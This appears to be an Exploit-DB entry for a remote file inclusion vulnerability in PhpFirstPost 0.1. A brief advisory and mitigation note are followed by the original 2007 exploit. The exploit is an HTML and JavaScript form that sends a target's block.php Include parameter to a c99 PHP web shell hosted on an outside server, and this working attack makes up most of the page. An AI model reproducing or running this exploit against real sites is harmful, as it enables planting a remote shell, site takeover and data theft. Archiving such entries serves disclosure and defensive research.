PhpFirstPost blog Remote File Include Exploit

vendor:

PhpFirstPost

by:

Dj7xpl

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: PhpFirstPost

Affected Version From: 0.1

Affected Version To: 0.1

Patch Exists: NO

Related CWE:

CPE: a:phpfirstpost:phpfirstpost:0.1

Metasploit:

Other Scripts:

Platforms Tested:

2007

PhpFirstPost blog Remote File Include Exploit

This exploit allows remote attackers to include arbitrary files on a vulnerable PhpFirstPost 0.1 website. The vulnerability occurs due to improper input validation in the block.php file. By manipulating the 'Include' parameter in the URL, an attacker can specify a remote file to be included, which can lead to remote code execution or other malicious activities.

Mitigation:

To mitigate this vulnerability, it is recommended to update PhpFirstPost to a patched version or apply the necessary security fixes provided by the vendor. Additionally, input validation and sanitization should be implemented to prevent remote file inclusion vulnerabilities.

Source

Exploit-DB raw data:

<html>
<head>
<title>..:: PhpFirstPost blog   Remote File Include Exploit ::..</title>

<script language="JavaScript">

/*


        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal   :   PhpFirstPost 0.1
[!] Download :   http://sourceforge.net/projects/phpfirstpost/
[!] Type     :   Remote File Include Exploit

---------------------------------------------------------------------

*/

 var path="/"
 var adress="block.php?" 
 var include ="Include=" 
 var phpshell="http://dj7xpl.by.ru/shell/c99.php?" 

 function command(){
     if (document.rfi.target1.value==""){
        alert("Exploit Failed...");
    return false;
  }



rfi.action= document.rfi.target1.value+path+adress+include+phpshell;
rfi.submit(); 
 }
</script>

</head>

<body bgcolor="#198ccd">
<center>

<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
  <b><font face="batangche" size="3" color="white">Target:</font><font
face="Arial" size="2"
color="white">http://Target.ir/blog</font><br><br>
<font color="#00FF00"size="+1" face="batangche">
</font>
<font color="red" size="2"></font></b>
<input type="text" name="target1" size="20" style="background-color:
white" onmouseover="javascript:this.style.background='red';"
onmouseout="javascript:this.style.background='red';"></p>
<p>
<input type="submit" value="Go -->" name="B1">
<input type="reset" value="Clear" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes"
frameborder="0"></iframe>
</p><br><br>
<p><font color="red" size="2" face="batang">Dj7xpl @ Yahoo . com </font></p>
</center>
</body>
</html>

# milw0rm.com [2007-05-12]